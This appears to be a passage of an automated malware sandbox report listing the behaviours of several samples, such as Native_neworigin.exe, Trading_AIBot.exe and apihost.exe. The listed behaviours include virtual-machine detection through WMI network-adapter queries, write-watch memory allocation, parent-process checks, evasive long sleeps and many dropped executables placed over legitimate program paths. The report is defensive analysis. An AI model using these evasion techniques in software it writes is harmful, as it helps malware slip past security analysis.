Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2AC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2EE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2DA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 22C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2380000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 4380000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 54C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2D4C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2C00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2E70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2CA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2320000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 24E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 44E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2D00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 3170000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2D90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 840000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2370000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 21B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Memory allocated: B40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Memory allocated: 26C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Memory allocated: 2560000 memory reserve | memory write watch
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 13_2_004019F0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window / User API: threadDelayed 1668 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window / User API: threadDelayed 419 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4599
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window / User API: threadDelayed 3068
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Window / User API: threadDelayed 6735
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Window / User API: threadDelayed 9377
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Window / User API: threadDelayed 410
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Users\Public\Libraries\aymtmquJ.pif Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\Public\alpha.pif API coverage: 6.3 %
Source: C:\Users\Public\alpha.pif API coverage: 7.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2968 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5440 Thread sleep count: 1668 > 30 Jump to behavior
